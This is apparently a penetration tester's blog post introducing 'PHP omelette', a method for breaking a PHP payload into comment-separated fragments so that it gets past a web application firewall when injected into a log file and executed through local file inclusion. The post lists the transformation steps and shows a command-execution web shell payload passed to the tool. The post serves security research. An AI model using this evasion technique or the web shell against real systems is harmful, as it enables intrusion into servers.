PHP omelette, code fragmentation for scripting languages
Code fragmentation is not exactly a new technique, when dealing with binary exploitation, techniques like egg hunter and omelette refers to various ways to bootstrap a larger payload from a smaller one. However when I needed to bypass a modern WAF on a pentest where I could inject a user controlled value into a log file which could then be executed via LFI I came up with this technique to fragment the payload in a way that it is fragmented, but still executes as if it was consecutive function calls. I was waiting to release this at a future conference talk, but as Robin recently wrote a blog post using a similar technique to execute fragmented javascript I though the time was right for releasing it now.
The broad concept is:
- Everything inside the
<?php ?>
tags is code - Everything inside the /* */ multi line comments are ignored
- PHP parsing has some flexibility
The preferred use of this is to inject a small stager payload, but bigger files could be transformed as well.
The steps are simple enough that they can be performed manually:
- Add comment after all opening tags
- Add comment before all closing tags
- Add comments before and after semi colons
- Add comment after comma
- Add comments before and after opening and closing pharanteses
- Remove duplicate comments
- Insert new line before each closing multi line comment
- Remove empty lines
./omelette '<?=passthru($_GET[cmd]);?>'
_ _ _ _ _ _ _ _ _
/\ \ /\_\/\_\ _ /\ \ _\ \ /\ \ /\ \ /\ \ /\ \
/ \ \ / / / / //\_\ / \ \ /\__ \ / \ \ \_\ \ \_\ \ / \ \
/ /\ \ \ /\ \/ \ \/ / // /\ \ \ / /_ \_\ / /\ \ \ /\__ \ /\__ \ / /\ \ \
/ / /\ \ \ / \____\__/ // / /\ \_\ / / /\/_/ / / /\ \_\ / /_ \ \ / /_ \ \ / / /\ \_\
/ / / \ \_\ / /\/________// /_/_ \/_/ / / / / /_/_ \/_/ / / /\ \ \ / / /\ \ \ / /_/_ \/_/
/ / / / / // / /\/_// / // /____/\ / / / / /____/\ / / / \/_// / / \/_// /____/\
/ / / / / // / / / / // /\____\/ / / / ____ / /\____\/ / / / / / / / /\____\/
/ / /___/ / // / / / / // / /______ / /_/_/ ___/\ / / /______ / / / / / / / / /______
/ / /____\/ / \/_/ / / // / /_______\/_______/\__\// / /_______\/_/ / /_/ / / / /_______\
/_________/ \/_/ \/__________/\_______\/ \/__________/\_\/ \_\/ \/__________/
============================================================================[<?= /*
Or if fragmenting code from a file:
./omelette "$(cat t/shell3.php)" > plate
The various scripts to fragment and inject the code can be found at: https://github.com/wireghoul/php-omelette. While aimed at PHP the generic methods outlined above can be applied to many languages, including javascript, C/C++ and others.